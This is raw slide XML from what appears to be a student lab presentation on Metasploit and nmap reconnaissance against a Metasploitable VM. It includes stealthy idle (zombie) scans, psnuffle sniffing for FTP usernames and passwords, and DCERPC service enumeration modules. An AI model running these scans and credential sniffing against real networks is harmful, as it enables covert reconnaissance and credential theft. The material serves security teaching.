          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Advanced Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>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0" name="Shape 530"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Shape 531"/>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Using a database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Shape 532"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using the command </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>nmap -oN (file name) (target)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>After the scan we can see the file with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> on the root directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="533" name="Shape 533"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3152762" y="3354212"/>
            <a:ext cx="5534025" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Shape 537"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="538" name="Shape 538"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3522850"/>
            <a:ext cx="6226773" cy="1403000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Shape 539"/>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Password Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Psnuffle comes preloaded on Metasploit, to access it </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>use: use auxiliary/sniffer/psnuffle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Then by using: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>pnsuffle will start sniffing traffic trying to find passwords and usernames for FTP logins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="541" name="Shape 541"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3018104"/>
            <a:ext cx="4308224" cy="500074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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5" name="Shape 545"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Shape 546"/>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PCAP Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Shape 547"/>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30200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Start by showing options: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Here you can see the PCAP file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Next find your pcap and change your directory accordingly with: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>cd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Once you’ve found it change the Pcap File option with: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>set PCAPFILE {file name}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Then run psnuffle on that file with: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>The PCAP file used in this example didn’t have passwords in it so nothing was returned.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="548" name="Shape 548"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947275" y="2844675"/>
            <a:ext cx="2739524" cy="2081175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="549" name="Shape 549"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="34827" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3278025"/>
            <a:ext cx="2259525" cy="1647825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="550" name="Shape 550"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2259525" y="4422318"/>
            <a:ext cx="3687749" cy="275807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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4" name="Shape 554"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Shape 555"/>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Idle Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Shape 556"/>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30200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Start by setting measploit to ipidseq with: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>use auxiliary/scanner/ip/ipidseq</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Next set the host to scan with: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>set RHOSTS {ip address}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>We set the ip to the metasploitable server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Next we found an IP with an Incremental IPID Sequence Class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>We then used: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>nmap -PN -sI {zombie IP} {target IP}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This allows us to scan an IP sneakily using a zombie IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668525" y="3050500"/>
            <a:ext cx="2818754" cy="1875349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="558" name="Shape 558"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487276" y="3050500"/>
            <a:ext cx="4199524" cy="1875349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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2" name="Shape 562"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Shape 563"/>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a:t>dcerpc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Shape 564"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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8" name="Shape 568"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Shape 56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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400"/>
              <a:t>Determine what services are available on the VM using the endpoint_mapper module in metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Shape 570"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="927650"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="571" name="Shape 571"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="1927762"/>
            <a:ext cx="6972300" cy="2314575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Shape 572"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170400" y="1988975"/>
            <a:ext cx="1368600" cy="1605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6" name="Shape 576"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Shape 57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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400"/>
              <a:t>Find RPC services that aren’t in Endpoint Mapper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="578" name="Shape 578"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1633399"/>
            <a:ext cx="8100301" cy="2430074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Shape 579"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6619175" y="1633400"/>
            <a:ext cx="738000" cy="237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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>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i="1" lang="en"/>
              <a:t>TCP Reverse Ident </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(-i, requires -t)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RFC 1413 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ident</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> protocol discloses owner of any TCP-connected process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Irrespective of whether that process opened connection in first place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requires full TCP connection to target port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>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3" name="Shape 583"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Shape 58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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800"/>
              <a:t>Scan a range of IP addresses and obtain info from the Remote Management interface of the DCERPC service using the dcerpc/management module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Shape 585"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="927650"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="586" name="Shape 586"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="589525" y="1426950"/>
            <a:ext cx="7329725" cy="2433350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Shape 587"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3710600" y="1475700"/>
            <a:ext cx="973200" cy="1605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1" name="Shape 591"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Shape 59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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800"/>
              <a:t>Find out what DCERPC services you can use on a TCP port using the dcerpc/tcp_dcerpc_auditor module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Shape 593"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
